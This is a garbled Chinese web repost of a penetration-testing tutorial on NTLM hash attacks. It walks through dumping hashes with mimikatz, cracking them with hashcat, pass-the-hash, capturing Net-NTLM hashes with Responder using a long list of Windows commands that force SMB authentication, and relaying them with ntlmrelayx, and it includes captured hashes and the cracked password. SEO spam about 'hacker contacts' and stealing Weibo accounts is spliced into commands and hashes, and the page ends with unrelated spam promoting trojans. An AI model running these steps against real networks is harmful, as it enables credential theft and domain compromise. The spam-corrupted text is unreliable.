有信誉度的 *** 黑客联系 *** -内网渗透——对于hash的攻击
文中从hash获得 *** ,工程爆破hash,hash中转,中继等层面全方位剖析,以直观详尽的实践活动来掌握攻击过程,过程较为详尽,请细心收看。
0x02 什么叫NTLM-hash、net NTLM-hash
NTLM hash是windows账户密码的一种hash,可从Windows系统软件中的SAM文档和域控的NTDS.dit文档中得到 全部客户的hash(例如用Mimikatz获取),获得该hash以后,可开展工程爆破密文、hach传送(PtH攻击), *** 黑客教你3分钟盗新浪微博
Net-NTLM的hash是根据NTLM的hash值历经一定的优化算法造成的,获得Net-NTLM的hash以后,可开展工程爆破密文、运用 *** b开展中继攻击,该hash不可以开展hach传送攻击。
什么叫NTLM hash?
NTLM hash的形成方式:
1、将密文动态口令转化成十六进制的文件格式
2、把十六进制转化成Unicode文件格式,每一个字节数以后加上0x00
3、再对Unicode字符串数组作MD4数据加密,形成32位系统的十六 *** 黑客教你3分钟盗新浪微博进制数字串
这儿我根据mimikatz专用工具先直观的掌握NTLM hash,mimikatz立即从 lsass.exe 里获得windows处在active情况账户弱密码,以windows server2012为例子:
从图中发觉:
NTLM hash:A1E32A2281B8C6DBC2373 *** 黑客教你3分钟盗新浪微博BFF87E8CB6E
弱密码:123456Abc
0x03 对NTLM hash暴力破解密码
假如根据其他方式得到 此hash,即A1E32A2281B8C6DBC2373BFF87E8CB6E,能用hashcat开展词典暴力破解密码,Hashcat主要参数以下:
hashcat64.exe -m 1000 A1E32A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force
主要参数表明:
-m 挑选hach类型,1000为NTLM
-o 輸出破译取得成功的密文
example.dict *** 黑客教你3分钟盗新浪微博 密文词典
开启out.txt,发觉密文123456Abc
留意:
因为windows server2012 r2、windwos 8.1及其高些版本号都干了结构加固,即严禁密文缓存文件到运行内存,而mimikatz是根据运行内存获得弱密码,则没法立即根据mimikatz获得弱密码,立即获取結果为“null”,但可根据修改注册表来获得。
参照
受维护客户 ( Protected Users )
http://www.bubuko.com/infodetail-2077149.html
0x04 NTLMhach传送
*** 黑客教你3分钟盗新浪微博hach传送通俗化而言,便是不用密文登陆,用NTLM hash可立即开展登陆。
在大家应用某服务项目时,Windows会携带本身的验证信息内容开展试着登陆,这一验证信息内容实际上便是Net-NTLM的Hash,大家应用什么服务项目会让Windows携带本身验证信息内容登陆?如浏览 *** b共享文件夹名称等,这时会应用验证信息内容试着登陆,而且启用lsass运行内存中的hash缓存文件试着登陆,这时应用mimikatz等专用工具改动缓存文件的hash为获得获得的hash,进而应用改动的hash开展登陆,它是hach传送的基本原理。文章内容后边提到的获得Net-NTLM的hash,实际上便是运用带验证信息内容浏览 *** b,如让管理人员浏览此wdb:<img *** 黑客教你3分钟盗新浪微博 src="\\192.168.191.129xx">,192.168.191.129被攻击者操纵的一台内部网PC,可获得管理人员的Net-NTLM hash。
先讲下验证要求过程:
1、手机客户端先向在当地对密码加密变成登陆密码散列
2、手机客户端推送验证要求,即产生密文账户
3、缺少对象一个16位的随机数字 *** 黑客教你3分钟盗新浪微博字发给手机客户端,做为一个 challenge
4、手机客户端再用流程1的登陆密码散列来数据加密这一 challenge ,做为 response回到给 *** 服务器。
5、 *** 服务器把登录名、给手机客户端的challenge 、手机客户端回到的 response ,推送域控制器
6、域控制器应用此登录名在SAM账号管理库的登陆密码散列 *** 黑客教你3分钟盗新浪微博,数据加密给手机客户端的challenge
7、与流程4手机客户端数据加密的challenge较为,假如2个challenge一致,验证取得成功
hach传送系统漏洞产生在流程4中,立即应用改动缓存文件后的hash,开展challenge数据加密,对challenge 数据加密的hash早已并不是推送账户相匹配的hash,只是攻击者根据别的方式获得的hash开展challenge数据加密。
Pth攻击演试:
吊舱ip:
攻击机ip:
假定早已得到 NTLM hash:
管理员身份运作mimikatz:
mimikatz运行命令主要参数:
sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E32A2281B8C6DBC2373BFF87E8CB6E
这时再开展其他验证实际操作,可立即用获得的总体目标hash开展登陆验证。
0x05 Net-NTLM hash获得
Net-NTLM hash不可以立即获得,根据Responder专用工具开展阻拦获得,此hash不可以开展hach *** 黑客教你3分钟盗新浪微博传送,但可开展中继分享,运用Responder等中介人专用工具,融合其他专用工具可自动化技术开展阻拦获得并中继分享,其他专用工具如 Impacket的ntlmrelayx.py开展中继分享。
在攻击机里运作Responder,这时攻击机仿真模拟为 *** B服务项目让受害人开展验证登陆,根据设定好多个仿真模拟的故意守护进程(如SQL *** 服务器,FTP,HTTP和 *** B *** 服务器等)来立即提醒凭证或仿真模拟咨询 – 回应认证过程并捕捉手机客户端推送的必需 *** 黑客教你3分钟盗新浪微博 hash,当受害人设备试着登录攻击者设备,responder就可以获得受害人设备客户的NTLMv2hash值。。
Responder下载安裝:
https://github.com/lgandx/Responder
Responder实际操作演试
手机客户端IP:
攻击机IP:
1、 不用编写Responder.conf,由于这时 *** B、HTTP服务项目不必关掉,等中继攻击时才关掉这两个服务项目。因而这儿先演试Responder怎么获取net-NTLM hash,在中继攻击里关掉 *** B、HTTP,是由于这时已不由Responder获得hash,只是立即让ntlmrelayx.py来进行这一每日任务。
2、 攻击机实行 python Responder.py -I eth0,这时处在监视情况
3、 *** 黑客教你3分钟盗新浪微博 运用 *** B协议,手机客户端在联接服务器端时,默认设置先应用该设备的登录名和登陆密码hash试着登陆,因此 能够仿真模拟 *** B *** 服务器进而捕获hash,实行以下指令都能够获得hash。
手机客户端实行以下指令,攻击机的Responder能接到。
> net.exe use \\hostshare
> attrib.exe \\hostshare
> bcdboot.exe \\hostshare
> bdeunlock.exe *** 黑客教你3分钟盗新浪微博 \\hostshare
> cacls.exe \\hostshare
> certreq.exe \\hostshare #(noisy, pops an error dialog)
> certutil.exe \\hostshare
> cipher.exe \\hostshare
> ClipUp.exe -l \\hostshare
> cmdl32.exe \\hostshare
> *** 黑客教你3分钟盗新浪微博 cmstp.exe /s \\hostshare
> colorcpl.exe \\hostshare #(noisy, pops an error dialog)
> comp.exe /N=0 \\hostshare \\hostshare
> compact.exe \\hostshare
> control.exe \\hostshare
> convertvhd.exe -source \\hostshare -destination *** 黑客教你3分钟盗新浪微博 \\hostshare
> Defrag.exe \\hostshare
> diskperf.exe \\hostshare
> dispdiag.exe -out \\hostshare
> doskey.exe /MACROFILE=\\hostshare
> esentutl.exe /k \\hostshare
> expand.exe \\hostshare
> extrac32.exe \\hostshare *** 黑客教你3分钟盗新浪微博
> FileHistory.exe \\hostshare #(noisy, pops a gui)
> findstr.exe * \\hostshare
> fontview.exe \\hostshare #(noisy, pops an error dialog)
> fvenotify.exe \\hostshare #(noisy, pops an access denied error)
> FXSCOVER.exe *** 黑客教你3分钟盗新浪微博 \\hostshare #(noisy, pops GUI)
> hwrcomp.exe -check \\hostshare
> hwrreg.exe \\hostshar e
> icacls.exe \hostshare
> licensingdiag.exe -cab \hostshare
> lodctr.exe \hostshare
> lpksetup.exe /p \hostshare /s
> 黑客教你3分钟盗微博 makecab.exe \hostshare
> msiexec.exe /update \hostshare /quiet
> msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog)
> mspaint.exe \hostshare #(noisy, invalid path to png error)
> msra.exe /openfile \hostshare #黑客教你3分钟盗微博(noisy, error)
> mstsc.exe \hostshare #(noisy, error)
> netcfg.exe -l \hostshare -c p -i foo
客户端执行 net use 192.168.191.131aaa
4黑客教你3分钟盗微博、 攻击机成功收到NTLMv2-SSP Hash
Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB00000000020008黑客教你3分钟盗微博0053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00黑客教你3分钟盗微博630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E003100330031黑客教你3分钟盗微博00000000000000000000000000
爆破net-NTLM hash
继续用hashcat进行hash爆破,Hashcat参数如下:
hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E0057黑客教你3分钟盗微博0049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150黑客教你3分钟盗微博DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 黑客教你3分钟盗微博 example.dict -o out.txt --force
参数说明:
-m 选择哈希类别,5600为net-NTLM
成功破解出明文密码,如下图:
打开out.txt,发现破解出明文123456Abc
0x06 *** B中继攻击
前面文章说过了,当获取到net-NTLM hash之后,由于不能通过类似哈希传递的修改缓存hash进行认证,此hash无法进行哈希传递,怎么进行攻击呢?可通过Responder工具拦截管理员的net-NTLM hash,配合ntlmrelayx.py进行中继转发。
Impacket下载:
git 黑客教你3分钟盗微博 clone https://github.com/CoreSecurity/impacket.git
进行中继前提:目标 *** B签名需要关闭,在 *** B连接中,需要使用安全机制来保护服务器和客户端之间传输数据的完整性,而这种安全机制就是 *** B签名和加密,如果关闭 *** B签名,会允许攻击者拦截认证过程,并且将获得hash在其他机器上进行重放,,从而获得域管权限。
目前 *** B常用来做为 *** B文件共享、打印机,如果签名关闭,可能导致文件共享、打印机被入侵。
比如我用虚拟机搭建的 *** B文件共享如下,具体认证登录过程文章前面部分已讲过黑客教你3分钟盗微博,看看这个效果:
虚拟机IP:192.168.191.139
先探测目标是否已关闭 *** B签名,命令如下:
nmap --script *** b-security-mode.nse 黑客教你3分钟盗微博 -p445 192.168.191.139 --open
如下是我用虚拟机搭建的域控环境测试,中继转发操作:
域内普通用户-受害者机器(win7)
域管理员(administrator)机器(windows server 2012 r2)
kali linux 攻击者机器
1、Responder关闭 *** B、HTTP
2、执行python Responder.py -I eth0 -r -d –w
3、执行python ntlmrelayx.py -tf targets.txt -socks - *** b2support
说明 :
targets.txt内容为域内受害IP 192.168.191.139
python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //
4、域管模拟输入一个共享,生成一个LLMNR请求
5、通过Responder发送黑客教你3分钟盗微博
6、NTLMv2哈希凭据被中继
攻击流程总结:
1、关闭Responder的 *** B和HTTP服务, 黑客教你3分钟盗微博 运行Responder工具来截取Net-NTLM哈希值
2、运行ntlmrelayx.py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务
3、ntlmrelayx.py将hash发送到目标列表中,如果中继操作执行成功会触发通知命令。
这里先大概熟悉下中继转发的原理基础,在下一篇会结合DeathStar和Empire,演示自动化域渗透,以及对net NTLM-hash的利用。
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/177123
安全客 - 有思想的安全新媒体
推荐去开心电玩单机游戏站。基本都有的百度搜NBA2K17然后游侠网之一个免安装绿色中文版下载了就行解压缩直接玩1、薪水帽:薪水帽就是总工资的上限,理论上是不可以超过的薪水帽是缴税的底线黑客教你3分钟盗微博,超过后,游戏中每超过1块钱要交1钱的税,1、开发商不同《NBA2K》是由Take-TwoInteractive旗下的RockstarGames、2KGames *** 的NBA篮球类游戏。《NBALI。有信誉的黑客联系方式
世界最著名的黑客大战现在黑客基本没有交易网站.一般都是通过 *** 群等方式进行底下交易就在黑客少年的房间里,调查那个披萨盒子,就能获得了黑客组织并没有公开化的,只不过是建了一个官方网站或者推特帐号对外发布消息而已,算是半公开吧,它们只在 *** 上活动,成员之间也不会公开身份,但是每个组织。
。.有是有,但多你不认识同事不可能就黑客教你3分钟盗微博因为想知道你跟你那女聊天就象你手机下木马吧!启不是你的隐私没了!看你这情况很肯能是那女告诉那同事的,什么渗透软件都可以入侵手机,想了解的,留下 *** !
只要你中了他的灰鸽子木马 那他想干什么都行。只要你把网线拔了,他就不可能入侵了。电脑关机一样可以被入侵,病毒可以通过adsl *** 连接入侵,而adsl是电信管理,电信局是24小时营业的。就算电脑。
到苹果店找售后直接帮你的手机进行刷机。登录iPhone中国 *** 网站中心,根据你设置的密保问题,可以直接找回密码并修改密码。预防手机被黑客控制的 *** :最。中国十大黑客排名
。去下载黑客黑客教你3分钟盗微博软件。比如冰河什么的。软件会自动帮你查找已中木马的机子,然后软件也会自己提供功能在别人的机子上恶作剧。当然这只是初级,当懂。
有信誉的黑客联系方式黑客是一种盗取别人 *** 信息资料的入侵者,面对它可是过街老鼠。但还是有些人为了利益而使用,在这里我是坚决反对的。因为黑客不但对别人造成损害,还会对。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
